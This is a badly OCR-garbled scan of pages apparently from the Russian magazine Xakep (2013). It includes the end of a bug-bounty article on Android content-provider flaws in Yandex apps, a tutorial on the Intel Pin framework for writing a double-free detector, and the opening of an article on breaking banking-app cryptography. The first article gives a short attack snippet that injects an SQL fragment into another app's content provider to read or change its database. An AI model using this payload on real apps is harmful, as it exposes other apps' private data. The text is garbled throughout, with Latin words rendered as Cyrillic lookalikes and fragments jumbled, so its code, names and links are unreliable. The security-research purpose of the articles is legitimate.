фаб1е апаго1а_тефадафа апЧго1а_тефадафа 3 СКЕАТЕ ТАВЕЕ 
ап4го1а_тефадата 
(1оса1е ТЕХТ) 

фаб1]е Ч4е\у1се_1а е\1се_14. 4. СКЕАТЕ ТАВЕЕ 
е\1се_1а (_1а 
ТМТЕСЕК РКТМАКУ 
КЕУ , Че\у1се_14 ТЕХТ 
ОМТОЧЕ) 

1паех $4911%е_ач®о1паех @еу1се_1а 5 пи11 

_Че\у1се_1а_1 


И видим, что структура таблицы схожа с той, что была в Яндекс.Почте. В остальных про- 
граммах отличалось только имя контент-провайдера. 


«АТАКУЮЩИЙ» КОД 

Для того чтобы произвести атаку такого рода, не надо никакой дополнительной магии или 
прав на уровне системы. Достаточно в своем приложении вставить следующие строки и ра- 
зобрать ответ: 


5Ег1п8 фагреф = "соп{феп* : //ги.уапаех .Че\у1се.1а.пау1 /аиПог1*у": 
СопфепеВезо1уег г = веСопфеп*Везо1уег(); 

ргозес1опАггау[ 0] = "* РЕКОМ $4911%е_птаз%ег--"; 

Сигзог с = г.ачегу (Чг1 .раг5е(фагве®), ргозесЕ1опАггау, пи11, пиу11, пи11); 


где {агае{ — контент-провайдер, а ргоесйопАггау — дополнительные параметры в запросе. 
Если мы отправим пустую строку, то получим просто всю информацию из таблицы, а если 
добавим к запросу "* ЕВОМ зайе_тазег--" — всю структуру ЗОШе БД. Таким образом наше 
приложение сможет получить или изменить данные другого. Исходники небольшой про- 
граммы, которая выводит структуру БД в виде всплывающего окна для некоторых уязвимо- 
стей из описанных выше, выложены на ОКНиЬ (6И.1у/12г\/7$2). 


ЗАКЛЮЧЕНИЕ 

В заключение хочу пожелать удачи как исследователям в поиске уязвимостей в чужих про- 
граммах, так и разработчикам — надеюсь, моя статья поможет им проанализировать свои 
приложения и быстро устранить все найденные баги. На сегодня это все, но я не проща- 
юсь — жди публикации о новых ошибках, а также о работе с другими типами уязвимостей, 
благодаря которым и ты сможешь попасть в различные залы славы. Удачи! 22 


ЗАГРУЗКА ПРИЛОЖЕНИЙ 
С РЕАЛЬНОГО УСТРОЙСТВА 


1. Проверяем наличие устройства 
ааб ае\1се$ 
2. Все установленные приложения хранят свой 


«установщик» в папке /ааа/арр, поэтому ска- 
чиваем: 


ааб ри11 /аафа/арр/ги.уападех. 
уапаехтар$-1.арк С: \ 


ОС Апагоа использует нумерацию каждой 
установленной программы, поэтому на конце 
может быть как -1, таки -2. 


. Далее можем реверсить методами, описан- 
ными в прошлых номерах, или устанавливать 
в эмул. 


ЗАГРУЗКА С ПОМОЩЬЮ АР! 


Энтузиасты отреверсили и составили АР! 

для работы с Соод!е Рау (ранее Апагоа Магкеф. 
Скрипт написан на РУПоп и выложен на ОННиЬ 

( ), есть также 
аналог на уаума. Для его работы тебе понадо- 
бится Апаго4 О реального устройства, которое 
прикреплено ктебе или какому-то другому поль- 
зователю, а также логин и пароль или АшИТокКеп. 
Апаго!О можно узнать, набрав на У$$0- 
команду ##8255##, где параметр а и будет 
твоим Апаго!аО. Все это вводим в файле сопйод. 
ру. Далее, например, можно найти все Яндекс- 
программы на маркете командой: 


сеагсй. апаех 


КЛАССИФИКАЦИЯ 
УЯЗВИМОСТИ ПО ОМАЗР 
МОВШЕ ТОР-10 

В РАМКАХ КОНКУРСА 
«ОХОТА ЗА ОШИБКАМИ» 


За МО1 (небезопасное хранилище данных) — 
МО5 (недостатки в механизмах аутентификации 
и авторизации в критичных приложениях) на- 
значают награду в 10 000 рублей, а для прочих — 
5000 рублей. За МОб (недостатки в управлении 
сессией) — МО8 (утечка данных в критичных 
приложениях) — 5000 рублей, прочих — 3000 
рублей. В особых случаях размер награды может 
быть увеличен. 

Для отправки информации о уязвимости ис- 
пользуется веб-форма 

или ты можешь просто 

отправить письмом на почту 
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На протяжении нескольких статей мы 
погружались в мир инструментации 
кода, сравнивали статическую и ди- 


РМВИБ 

О популярности фреймворка Рт в мире информацион- 
ной безопасности свидетельствует его активное исполь- 
зование такими крутыми исследовательскими центрами, 


_ ый как шптипНу, Хупатюс$, Вар а7, Зоигсейге \УАТ, СОЗЕМС 
намическую и, рас РИ ИНОЕ: и так далее. Неудивительно, что знание ОВ! уже сейчас 
сматривали различные фреймворки. О19На! ЗесигИу встречается как одно из ключевых требований к специ- 
С @еудокитома$ алистам по оценке безопасности ПО и разработке экс- 

егодня же настало время вплотную плойтов, например на должность разработчика эксплойтов 
познакомиться с фреймворком Р!п, РЕ 

_. Помимо этого, ОВ|!-фреймворки все чаще используют- 

используемым для динамическои ры ся для решения задач на различных СЕТ-соревнованиях. 

< _ : СХ Достаточно лишь взглянуть на решения заданий с раастЕ 

бинарной и, разобрать УЕЗХ 2013 от команды ЕтаБагеп (Би.1у/18актгу) и с МОН2К1З 

ся, как писать свои риюоГы (модули ЧАСТЬ З от @/опатапЗамап (БИ.1у/18иЕ]х!), чтобы убедиться, 

е что без привлечения фреймворка Рт на них ушло бы про- 

для данного фреймворка) и где это —— =—_ сто катастрофическое количество времени. Как видишь, 


все указывает на то, что с течением времени фреймворк 
Рш будет только активней использоваться для решения 
различных задач в области информационной безопасно- 


к 2/2 /{ 
может нам пригодиться при решении 33/7 


задач информационной безопасности. 


ХАКЕР 07 /174/ 2013 Ин ГТ( СТ | |@ ОУмМ лен | ТС а АЦИЯ = ЭВОЛ |] Ю ЦИЯ анализа 


|п аадвоп ю Ше гедигетей 5, уе ргеГег сап4дае5 упо Пауе ехрепепсе: 


» Осуеортпа ехро|$ чата Ме Меазрю" Егатемюгк 

» Кеуегзе епопеетпа сотрйед аррИсавопз 

» ЭМТИ/ЗАТ вомегв 

» \Уапои$ пип-йте апау$1$ {есппаиуе$ 

Ру22-е5п9 

* Ргодгаттта шп овег а55етЫ\ |апоцадез, зисИ аз АРМ, РРС, ЗРАРС, МР 


» Етреддеад демсе гезеагсй апа ехроКайоп 


А теге ед райе5 По! ета! Пет гезитез ю |об$[айтеазрой. сот, 


сти. Поэтому, чтобы не отстать от передовых технологий, мы 15% 
с ним сегодня и познакомимся. Начнем, как обычно, с теории 
и азов, а затем уже перейдем к практике. 


Требования в вакансии 
для работы в команде 


Меазрюой 
УРОВНИ ГРАНУЛЯРНОСТИВРШМ 
Так как основная идея инструментации заключается во встав- РЯ 
ке собственного кода в чужой, то очень важно определиться, Уровни гранулярности 
куда именно мы хотим вставить наш код. От этого зависит вРт 


как уровень контроля над программой, так и скорость работы 

программы под инструментацией. Чем больше контроль, тем 

меньше скорость, и наоборот. В Рт назначаемые пользова- 
телем обработчики могут работать с анализируемым кодом 
на следующих уровнях функциональности и гранулярности: 

е Инструкции (11$). Обработчик, который вызывается 
длякаждой инструкции исследуемой программы, регистри- 
руется при помощи функции 1№$_АадатугитетРиптсйоп(). 
Назначать обработчики для отдельных инструкций можно 
с помощью 1М№$_шзечСа!(). Для анализа инструкций Рт 
использует библиотеку под названием ХЕР. Ее АР! также 
доступен для использования в инструментальных модулях. 

е Базовые блоки (ТВАСЕ). Под базовым блоком подраз- 
умевается линейный участок кода, находящийся между 
двумя инструкциями, которые или являются точкой входа 
вектора исполнения, или непосредственно меняют значе- 
ние ЕР (САШ(, УМР/ихх, НЕТ и так далее). Как видишь, в Рм 


понятие ББ отличается от классического определения. Об- У\АВММ\МС! 
работчик, который вызывается для каждого базового бло- 
ка исследуемой программы, регистрируется при помощи На момент написания 


статьи Рт еще не под- 
держивал \/5иа! З{и до 
2012. Поэтому для 
разработки собствен- 
ных Рт-инструментов 
используй более ранние 
версии \М!зиа! Зти ат. 


функции ТВАСЕ_АдатзгитетРипсйоп(). Назначать обра- 
ботчики для отдельных базовых блоков можно с помощью 
ВВЁЕ_штзечСа!(). Для работы с отдельными инструкциями, 
составляющими базовый блок, в теле обработчика можно 
использовать функции ВВЁЕ_п$Неаа()/ВВЕ_ ш$Мех(). 

е Функции (АТМ). Обработчик, который вызывается для каж- 
дой функции исследуемой программы, регистрируется 
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Программа 


Исполняемый 
модуль 


Функция 


при помощи функции ВТМ_АадатухгитетСа!(). Для работы 
с инструкциями исследуемой функции внутри этого обра- 
ботчика следует использовать ВТМ_шт$Неаа()/АТМ_шп$Тай(), 
а также семейство 1М№$-функций для исследования самих 
инструкций. Стоит сказать, что АТМ_АадатгитетСа!() 
работает корректно только при наличии отладочных сим- 
волов, в противном случае стоит использовать обработку 
инструкции сай. 

е Исполняемые модули (МС). Обработчик, который вы- 
зывается при загрузке какого-либо исполняемого модуля 
в контекст исследуемого процесса, регистрируется при по- 
мощи функции 1М@_АдатзкитетРиптсНоп(). Для работы 
с загружаемым модулем из обработчика используются 
другие 1МС-функции, а для работы с отдельными секция- 
ми — функции ЗЕС-семейства. 


РИМАР! 

Если говорить про АР! Р'т, то он достаточно большой, поэтому 
полностью его рассматривать нецелесообразно и скучно. Так 
что мы просто бегло пробежимся по основным его классам, 
чтобы ты мог впоследствии в нем ориентироваться. Но перед 
тем как мы пойдем дальше, необходимо сделать одно неболь- 
шое замечание. 

Так как ядро Рш перехватывает исполнение целевого про- 
цесса начиная с точки входа системного загрузчика, в инстру- 
ментальных модулях гарантировано безопасное использова- 
ние только функций самого Рт и стандартной библиотеки С/ 
С++. Попытка использования, к примеру, \М/п32 АР! чаще всего 
приводит к неработоспособности инструментального модуля. 
Это необходимо помнить при написании собственных инстру- 
ментов. 

Ну а теперь вернемся опять к АР!. Итак, Рт предоставля- 
ет следующие АР!, которые не связаны с уровнями грануляр- 
ности инструментирования программы, а предназначены 
для вспомогательных задач: 


х8б6 64 6п 
З2 БИ 


Запуск приложения под Р: 


р1п.ехе [р1п_ор{1оп$] -Е р1п®оо1_патме.а11 [р1п®оо1_орЕ1оп$] -- арр_пате.ехе 


Приаттачить Ри к уже запущенному приложению: 


р1п.ехе [р1п_ор1оп$] 1001] _паме. 411 


где рторНоп$ — параметры работы самого Рт, рийоотате.ай — инструментальный 
модуль, рифоо! орНоп$ — параметры инструментального модуля, аррпате.ехе — инстру- 
ментируемое приложение. 


11001 _ор{10оп$] -р1а <#р1а> 


Миа о\м/$ 

Чпих те т 
О$Х т те 
Апаго!а [г = 


Поддерживаемые ОС и архитектуры 
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._ Инициализация и контроль программы (СОМТНО!.. Данная 
группа функций используется для инициализации Ри, за- 
пуска приложения и установки обратных вызовов для вы- 
хода из приложения и подобных событий. 

. Работа с символами исполняемого модуля (З\УМ). Обеспе- 
чивает информацией об используемых отладочных сим- 
волах в исполняемом приложении. Для этого сначала не- 
обходимо вызвать РИМ_шЁЗупо|$(), чтобы символы стали 
доступны. Доступ к символам можно получить как во время 
инструментации, так и во время анализа. 

. Регистры (АРЕС). Данная группа функций используется Рт 
для работы с регистрами как во время инструментирова- 
ния, так и во время анализа. 

. Аргументы для процедур инструментирования (АВС). Опи- 
сывает аргументы для процедур, которые непосредственно 
производят инструментацию программы. Может описывать 
порядок выполнения процедуры (до выполнения кода, по- 
сле выполнения кода, до и после), порядок выполнения об- 
работчиков для одной и той же инструкции (если их назна- 
чено несколько на нее одну) или просто типы передаваемых 
параметров (1ААС_АБОНИМТ, 1ААС_РТРВ, 1ААС_ВООЕ, 1ААС_ 
ИМТЗ2, ААС 1М$Т_РТВ, 1ААС_ВЕС_\АШУЕ и так далее). 

. Быстрая буферизация (ВУЕЕЕА). Эта группа функций 
предназначена для работы с данными, которые хранят- 
ся в буфере Рт. Функция РИМ_ОЭейпеТгасеВиНе() ис- 
пользуется для создания места для хранения данных, 
№5 _шзечргИВиНе() используется для заполнения данного 
буфера. Это может быть полезно для оптимизации работы 
инструмента и при работе с самомодифицирующимся ко- 
дом. 

. Прототип: описание процедур приложения (РАОТО). Пред- 
назначена для описания прототипа процедур приложения, 
которое подвергается инструментированию, что позволя- 
ет значительно улучшить анализ процедур. В прототипе 
описывается соглашение о передаче параметров в функ- 
цию, тип и размер каждого аргумента функции. Это может 
быть очень полезным при описании функций с перемен- 
ным количеством параметров (типа $саптТ). 

. Потоки (ТНВЕАО). Данная группа функций предназначена 
для работы с потоками и между потоками. Данные АР! до- 
ступны в каждом потоке, включая любой внутренний поток, 
порожденный инструментом. 

. Процессы (РВОСЕЗ$). Предоставляет информацию об ин- 
струментируемом процессе. Также доступны в любом по- 
токе, включая любой внутренний поток, порожденный ин- 
струментом. 


Список АР! довольно внушительный, но теперь, надеюсь, 
ты уже хоть немного представляешь, к какой группе функций 
стоит обратиться при реализации того или иного функционала. 


РИМДЛЯ ФАЗЗИНГА 

На самом деле Рт можно использовать абсолютно на всех ста- 
диях процесса фаззинга: от подготовки тест-кейсов до ловли 
крешей. 

В подготовительной стадии Ри отлично подходит для ана- 
лиза соае соуегаде с целью выбора наименьшего количества 
тест-кейсов, обеспечивающих наибольшее покрытие иссле- 
дуемого кода. При этом мы легко можем играться с уровнем 
точности (гранулярности) — от инструкции до исполняемого 
модуля. Чаще всего используется уровень базовых блоков. 

Далее в процессе фаззинга (если он мутационный) Рт 
можно использовать для реализации т тетогу фаззера. Это 
не особо сложно, так как мы полностью контролируем как по- 
ток данных, так и поток управления программы. 

И наконец, в заключительной стадии мы можем как про- 
сто ловить падения программы при возникновении Ассе$$ 
\Лоайоп, так и на основании определенных сигнатур опре- 
делять баги до их фактического проявления. Например, 
для идентификации переполнения буфера в стеке можно пе- 
ред выполнением инструкции ВЕТМ проверять корректность 
хранимого адреса на стеке. Или еще пример: вести собствен- 
ный счетчик ссылок на объект, и если объект удален, а ссыл- 
ки на него еще остались, то значит, мы, скорее всего, нашли 
изе-аНег-Нее багу. При более детальном анализе возникнове- 
ния ошибки Рт совместно с ХЕБ можно использовать для фа! 
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< Мам Аррёсавоп Соде 


Графическое пред- 
ставление результата 
работы УЕВА 


АА 


Ри соттипНу: 


{есп.дгоир$.уапоо.сот/ 


гоир/ртпеа4$ 


ргораданНоп, что позволит определить, какие именно входные 

данные привели к падению. 
Приведу еще несколько проектов, которые обязательно 

пригодятся при фаззинге: 

1. Соае-соумегаде-апа!у$1$-001$ (БИЛу/ВУЕ&ауУ) — анализатор 
покрытия кода. 

2. РипТтасег (аИВиб.сот/агиаа/ВипТгасег) — набор инстру- 
ментов для отслеживания потока управления программы. 

3. Раза (Би.1у/16ОТизх) — еще один инструмент для анали- 
за покрытия кода (да, их действительно много). 

4. Ршод (соде.доое.сот/р/кегскпо $) — крутой трейсер 
с поддержкой \ММтаом/5/Ипих/Мас и х32/х64-архитектур. 


РИМ ДЛЯ ВЕ 
Область применения ОВ!-фреймворков просто огромна, и ос- 
новная их задача — это восполнить недостатки статического 
анализа. Все, что неизвестно / не определено при статиче- 
ском анализе (относительные переходы, виртуальные вызовы, 
содержимое памяти, динамически генерируемый код), можно 
легко и просто узнать в процессе выполнения. Также есть еще 
одно интересное направление, связанное с восстановлени- 
ем исходной структуры данных. Задача состоит в том, чтобы 
по операциям, выполняющимся над данными, определить 
их тип (роищег, итедег, спаг, Зги< и так далее) и размер. 

Вот небольшой перечень инструментов, которые ты мо- 
жешь взять за основу для написания собственных (чтобы за- 
ново не изобретать велосипед): 

1. КегскпойЙ$ (соае.даоое.сот/р/кегскпой$) — инструмент 
для полуавтоматического детектирования криптографиче- 
ских примитивов в программах. 

2. Хгет Нпаег (БИ.у/ЛакоС\У) — набор инструментов 
(1РАРУПоп плагин и рифо9о!) для восстановления пере- 
крестных ссылок, которые неизвестны до выполнения 
(типа са! еах), в файле баз данных РА Рго. 

3. ОЁШСом (БИ.У/1Н2\/Р$) — набор инструментов для записи 
выполнившихся базовых блоков программы. 

4. Випйте-{гасег (а\пиб.сот/пеигоо/гипите-{гасег) — соз- 
дает трейс выполнения программы со значениями реги- 
стров и обрабатываемыми участками памяти. 


Также стоит отметить, что с версии 6.4 РА Рго имеет соб- 
ственный встроенный модуль-трейсер, базирующийся на Рт. 


РИМ ДЛЯАНАЛИЗА МАПЛММАВЕ 

Когда говорится про использование ОН для исследования 

паМаге, то обычно подразумевается две области: автомати- 

зация распаковки и детектирование шелл-кода. На сегодняш- 
ний день для того и другого уже есть готовые ритоо1. Напри- 
мер: 

1. УЕВА (сэг.|ап!.до\у/мега) — инструмент для визуализации 
работы программы. Очень наглядно можно видеть, где ра- 
ботает распаковщик, а где основная часть таМаге. 

2. Тироих (соде.доое.сот/рАтроих) — анализатор упаков- 
щиков зловредов. 

3. ПасебЗимег (соде.аооче.сот/рДащетаНтоо!$) — набор 
инструментов для анализа вредоносного кода. 


4. Соа\маге (аипиб.сотюгетег/ао@\маге) — совсем неболь- 


шой помощник для анализа вредоносного кода. 


А вот при анализе эксплойтов (которые часто используют- 
ся во вредоносном ПО), а точнее, шелл-кодов могут приго- 
диться следующие два инструмента: 
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1. опесоае аитрег ( ) — дампер стандартных шелл-кодов, 
принцип работы которых основывается на передаче управления на Заск 
или пеар. 

2. МоНом-пШоаноп$ ( 
шелл-коды и УЙ-шелл-коды. 


) — прототип, идентифицирующий РОР- 


Для более глубокого понимания автоматизации деобфускации и рас- 
паковки советую изучить презентацию ОБупаптс Втагу шзтитещайоп Гог 
ОБеобТизсайоп апа Упраскпча ( ). Также полезно будет ознако- 
миться с презентацией парней из Мгсгоз$ой под названием Зпе!соае апау$!$ 
изта Аупаптс Бтагу шугитетайоп ( ). Они также разработали 
детектор шелл-кода на базе Рт под названием ЗНАМ (Пе 5Не!соаде АМаутег), 
но, к сожалению, в открытый доступ его не выложили. Зато как он работает, 
описали подробно, так что нет проблем его реализовать собственными уси- 
лиями. Их детище способно ловить как классические шелл-коды, так и ВОР. 


РИМ НАПРАКТИКЕ 
О структуре и способах применения поговорили. Теперь настало время рас- 
смотреть на практике, как работать с этим чудесным фреймворком. 


Установка и настройка 

Прежде всего идем и скачиваем с официального сайта ( ) 
фреймворк Рт (или берем с нашего диска). Я использую \М!зца! Зфиадо 2010, 
поэтому скачал архив по ссылке ус10. Следующим шагом надо будет рас- 
паковать его в любое удобное тебе место. Я, например, распаковал его 
вО:\рт-2.12-58423-тз\ус10-мипаом5. Собственно, на этом вся установка за- 
вершена, можно переходить к использованию. 

Насбудетинтересовать поддиректория \зоигсе\1001!$\, вкоторой находят- 
ся уже реализованные инструменты. Пробежавшись по папкам, ты увидишь 
кучу исходников и таке е’ов для их сборки. Но надо сказать разработчикам 
спасибо: они предоставили также проект-шаблон для студии, на основании 
которого можно очень просто создать свой собственный модуль, не колдуя 
с такеНе’ами и не заморачиваясь с путями и параметрами компиляции. 
Находится он в папке МуРтТоо/. Его-то мы и возьмем за основу. Создаем 
в \зоигсе\{оо!5\ копию папки МуРтТоо! с названием своего будущего ин- 
струмента, например Бонч еРгее. 


Задача и алгоритм 

Теперь о самой задаче, которую мы будем реализовывать. Сегодня нашей 
целью будет отлов багов в программах, когда освобождается уже осво- 
божденная память, то есть когда происходит второй вызов функции Нее() 
для уже освобожденной памяти. 

Каким образом мы будем отлавливать такие баги? Все достаточно про- 
сто: в приложении и динамических библиотеках будем искать функцию 
па!ос() и устанавливать обработчик, который бы срабатывал после ее вы- 
зова и сохранял возвращаемое ею значение в массив. Аналогично и с функ- 
цией тее(), также надо установить обработчик, который будет проверять 
наличие указателя на освобождаемый участок памяти в нашем массиве. 
В случае если он там присутствует, просто удаляем его, а если отсутству- 
ет — значит, мы его уже удалили и пытаемся сделать это повторно, то есть 
вот она, аоцЫе Нее бага. 


Кодинг 

Итак, с алгоритмом разобрались, открываем скопированный проект и идем 
писать исходный код (тот, что остался после копирования, можно просто 
удалить). Прежде всего подключаем заголовочные файлы: рт.Н, 1оз{геат, 
опапф, авоййт, 1$, зипо.п, зю.п. После чего задаем глобальную пе- 
ременную, в которой будут храниться все выделенные функцией та!ос() 
адреса: 


115&<АОБОВКТМТ> Ма11осАдаг$; 


Теперь пишем функцию, которая будет вызываться после та!ос() и сохра- 
нять в Ма!осАдаг$ адреса выделенных ею участков памяти. 


\УОТО Ма11осА+ег(АБОВТМТ геф, АОБОВТМТ 11$) { 


(геЕ != 0) { 

115{<АООВТМТ> : : 1{екгафог р; 

р_ = Япа (Ма11осАааг$ .Беё1п(), Ма11осАааг$ .епа(), геф); 
(Ма11осАдаг$.епа() == р) { 
Ма11осАдаг$ .ризН_Баск(ге*); 


Одной из важных (не независимых) частей Рт является библиотека 
ХЕО (акроним от Х8б Епсоаег Бесоаег). Она позволяет кодировать 

и декодировать х86б6 (1А-32 и ме® 64) инструкции. Декодер на вход 
получает последовательность байтов (машинный код) и возвращает 
структуру, описывающую опкод, операнды и флаги. Кодер произ- 
водит обратную операцию. На текущий момент ХЕБ поддерживает 
Чпих, \МИпаомз, ОЗ Х, ЕгееВЗБ и умеет читать бинарные образы фор- 
матов РЕ/СОЕЕ ЕЁ и МАСНО для 325 и 645. Для вывода инструкций 
поддерживается три формата: И\е|, АТТ $У$\ и внутренний (очень 
детализированный). 


// Поиск инструкции, которая перемещает значение 
// из памяти в регистр 
1+ (1№_Орсоае(1п5) == ХЕОБ_ТСЬА$$_МОМ && 
Т№_Т$МетогуКеаа (1п$5) && 
Т№5_ОрегапаТ$Веё(1п$, _) && 
Т№_ОрегапаТ $Метогу (11$, _)) 
ео ОА 


// Дизассемблируем 1%ехЕ буфер байт 
хеЧ_еггог = хед_4есоде ( &хеда, 
ХЕБВ_$5ТАТТС_СА$ЗТ(соп$Е хед_и1п*8_+* ,1%ех®), Буфез); _ 


Чем это может быть полезно в задачах ИБ? Тут от банального 
написания анализатора эПе|соа’ов до написания инструмента, 
реализующего фашт{ ргорадаНоп (отслеживание распространения/ 
влияния каких-либо данных в программе). 

В последнем варианте мы можем получить хорошую деталь- 
ную информацию о каждой инструкции в процессе программы и 
сказать, как они влияют на флаги и как внутри них операнды влияют 
друг на друга, то есть можем следить за процессом ант. 


Апй-аебчцоа и апй-\УМ техниками в наше время уже никого не уди- 
вишь, а вот противодействовать активно набирающим популярность 
ОВ!-фреймворкам надо начинать. Так, парни из Соге Зесигиу на кон- 
ференции ВЕСоп 2012 представили исследование Вупатс Втагу 
шзтитещайоп Егатем/огк$з: | Кпом/ уои’ге 1Пеге зрута оп те. В дан- 
ной работе они рассмотрели техники антиинструментации, направ- 
ленные на фреймворк Рт. Провернуть им это удалось достаточно 
просто: все в основном заключается в обнаружении рмт.а! (ее 
свойств и характеристик), обнаружении работы ЛТ-компилятора, 
проверки Папаегов, временных задержек и так далее. В результа- 
те они написали программку еХай (еЖетзе Апи-шзтитетайоп 
Тезег), которая позволяет детектить инструментацию. Правды ради 
стоит сказать, что Рт абсолютно никак себя не скрывает. В общем, 
еще есть огромная область антиантиинструментации :). 


Совсем недавно компания ще! выпустила версию Рт для ОС 
Апаго. Для запуска Рт на Апагоа-девайсе понадобится: хостовая 
Ч/пих-машина, гоо{-доступ на устройстве и установленный ВизуВох. 


Также надо будет скачать Апагоа ЗОК и Апагоа МОК. После этого 
компилируем ритоо! на хостовой машине с указанием целевой ОС 
(ТАВСЕТ_О$=апагоа), заливаем его на устройство и запускаем как 
обычно. 


7о Взлом 


вх 


Сое 00 59 20 @2 61 60 65 2А У-.аве* 
60 во ео ео ео ео ео ее ........ 
0х181е60 60 ео в 00 @= ео ее ее ........ 
ее ее ее ©е0 09 00 ев ®@........ 
ЗА бЕ 62 66 69 6С 65 2А — *поЕе* 
66 ее ее ео ео её ео ее ........ 
63 ее ©0 ©0 @= ео ее ® ........ 
0е ее ее ее ее ее ее е ........ 
80 5А 20 @2 90 ©6 ее ее нее не 
60 ее ее ео ео ео ео е ........ 
18 00 ее ©0 12 ео ее ее ........ 
ее ее ее ее ©е0 00 ее ®@ ........ 
55 70 6С 6Е 61 64 50 72  ир1оадрг 
69 бЕ 74 6$ 72 44 72 69 — Зпфегогя 
76 6$ 72 50 61 63 68 61  ‘чегРаска 
67 65 41 60 ее ее ее е@  вед..... 


ОваззетЫу 
са! 0х44е5 6! 
са! 0х44е534 


са! 0х44е56Е 
са! 0х453832 
сай 0х453832 


е1е 


[Об ("Ма11ос а@агез5 а1геаау <= 
сауеа?!\п"); 

сегг << "а1геау зауед" << Пех << += 
115 << епа1; 


} 
} 
е15е 
{ 
[ОС ("Ма11ос +а11\п"); 
} 


Теперь очередь за функцией, которая перед вызовом Ттее() 
будет проверять, не была ли уже освобождена память. 


// Функция, которая вызывается каждый раз перед 
// вызовом функции +гее() 
ОТО ЕгееВефоге ( АБОВТМТ фагзеф, АООВТМТ 1п5*) 


{ 


115{<АООКВТМТ>: : 1Еегафог р; 
р = Япа (Ма11осАааг$ .Беё1п(), Ма1ТосАааг$ . += 
епа(), фагвет); 
1+ ( (!(Ма11осАааг$ .етрфу())) && «= 
(Ма11осАдаг$.епа() != р) ) 
Е ЕЕ НИ И 
// Удаляем адрес из нашего списка 
р = Ма11осАдаг$ .егазе(р); 
р 


е1хе 


{ 


// Происходит вызов +гее() адреса, который 
//_ не выделен -> БоиБ1е +гее уязвимость! 
сегг << Пех << фагвеф << " "<< 115% << = 
епа1; 


Осталась еще одна функция, которая будет применяться 
для инструментации модулей и устанавливать наши обработчи- 
ки на функции Нее() и таПос(), — !таде(1МеО та, МОЮ *\). Из-за 
экономии места здесь мы ее код приводить не будем, ознако- 
миться с ней ты можешь в полном исходнике, который найдешь 
на нашем диске. 

Ну и наконец, собираем все воедино в функции тат(): 


1 ма1п(1пЕ агрс, сПаг *агрРУ[]) 


{ 


// Инициализация обработки символов 
РТМ_Тп15утбо1$(); 


— 


ВипНите -1гасегв РАРго 


> 


Окно настройки Рт 
{гасегв ОА Рго 


АА 


\Могк$Пор «В!пагу 
пукитетаноп Юг 
зеситу ргое$$1юпа!$: 


ИЕ р://БН.У/дЕмКа 


РМ И РУТНОМ 


Реверс-инжиниринг 
без РУ оп сегодня уже 
нельзя представить. 
Везде нужна автоматиза- 
ция и мощь скриптовых 
языков программирова- 
ния. В результате всего 
этого появились два бин- 
динга на РуУПоп для Ри: 
РипРу (6.|у/РОМЕ7Т) 

и Ргосез$Тар (6и.1у/ 
с70\5е). Таким образом, 
в одном проекте можно 
легко использовать 
мощь |ВАРУогп, УТгасе, 
23Руи Ргосез$$Тар/РиРУу. 
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Ух рио 3 
| ы НИ = = 
РМ Впагу ра® О:\р-2.12-58423-т5\с10-иипдомия\рп.ехе ыы 6» 
РИМ ТооБ ра С:\Ргодгат Рйе5\ОА\рмотя\деБидое! " [за | 
Тгасе ий яге 1000000 ы 
] 
Оп $Еапир епаЫе РИМ Тоб 
Г] ваз Вюск васпо С] ребид пюде 
Рипсбоп гала 
Г] Ведебег чашез гесог па 
_ Ема агдитегиз: 
| Вегоге РТМ (001 у 
_ АКег РИМ оо] у 
| = 


// Инициализация библиотеки Р1п 


1+ (РТМ_Ти1(агес, агг\у)) 
{ 


} 


//_Регистрируем функцию, которая вызывается 
//_ для инструментации модулей 
ТМб_АдаТпгитептЕРипс Топ (Ттазе, 9); 


гефигп Узаре(); 


//_ Запуск 
РТМ№_5ФагЕРговгат(); 


гефигпи @; 


Осталось сохранить все изменения, нажать <Е7>, чтобы 
сбилдить проект, и ты получишь свой первый инструментиру- 
ющий модуль для фреймворка Рт, модуль этот будет искать 
оне Нее уязвимости. Ну а как инструментировать приложе- 
ния с помощью своего модуля, я уже показывал выше. 


Отладка 

В завершение хотелось бы немного коснуться вопроса отладки 
своего рт_1ю901. Дело втом, что для своей работы Рт использует 
отладочные АР, поэтому просто запустить свой модуль из-под 
отладчика не получится. Вместо этого надо запустить рт из ко- 
мандной строки и передать ему опцию -раи$е {оо п, которая 
заставит его вывести РО процесса и остановиться на п секунд. 
За это время к нему можно будет приаттачиться отладчиком 
\М5 ца! Зиаю. 


№ р1п <р1п ор%1оп$> -раизе_ №001 20 -+ <+оо1 пате> ‹- 
<ф001 ор10п$> -- ‹арр пате> ‹арр ор*1оп$> 


р1п зизрепаеа ргосез$ [149=<‹р1а>] ма11па Фог 
дериё5ег аФасй. Ргез5 <Епфег> мйеп геаау 
Фо соп1пие... 


Это может быть немного неудобно, но все же лучше, чем 
сидеть совсем без отладки или отлаживать с помощью лог- 
файлов. 


ЗАКЛЮЧЕНИЕ 

Ну вот и подошла к концу серия статей про инструментацию 
кода. Теперь ты знаешь, что такое инструментация, с чем ее 
едят, какие фреймворки можно для нее использовать. И даже 
представляешь, как написать собственный модуль для Ри. 
Дальше дело только за тобой. Овладев хотя бы одним из рас- 
смотренных фреймворков, ты сможешь поднять свои знания 
на еще один уровень вверх и стать очень востребованным спе- 
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НОРМАЛЬНЫЕ ГЕРОИ 
ВСЕГДА ИДУТ В ОБХОД: 


РУКОВОДСТВО ПО ЛЕЧЕНИЮ СЕРТИФИЦИРОВАННОЙ 
КРИПТОГРАФИИ В БАНКОВСКИХ ПРИЛОЖЕНИЯХ 


Почти каждый хакер или пенте- 
стер время от времени сталки- 
вается с нестандартными крип- 
тографическими протоколами, 
которые можно встретить в бан- 
ковской сфере, в технологических 
сетях предприятий и так далее. 

В этой статье мы расскажем о ме- 
тодике исследования и взлома 
таких систем на примере одного 
банковского приложения. Ты уви- 
дишь, как просто иногда обойти 
сложную криптографическую 
защиту из-за того, что разработ- 
чики не слишком хорошо знают 
современные протоколы уровня 
приложений. 


Андрей Петухов, 
Е 
апагем.реикпоу@зопа!ар.ги 


У 


Георгий Носеевич, 
МГУ имени М. В. Ломоносова 
меррещез«@ризймпаскег$.ги 


У 


Денис Гамаюнов, 
МГУ имени М. В. Ломоносова 
дата]ип@зес!ар.с$.тзи.5и 


ПРЕДИСЛОВИЕ 

Как известно, существует три основных класса уязвимостей 
программного обеспечения: уязвимости проектирования, реа- 
лизации и эксплуатации. Последние достаточно просты с точки 
зрения исправления, первые же наиболее сложны. При этом 
уязвимости проектирования не только труднее фиксить, 
но и наиболее «хлебно» искать с точки зрения исследователя 
безопасности или хакера, потому что в этом случае можно полу- 
чить наиболее долгоживущую уязвимость и наибольшее число 
уязвимых инсталляций. 

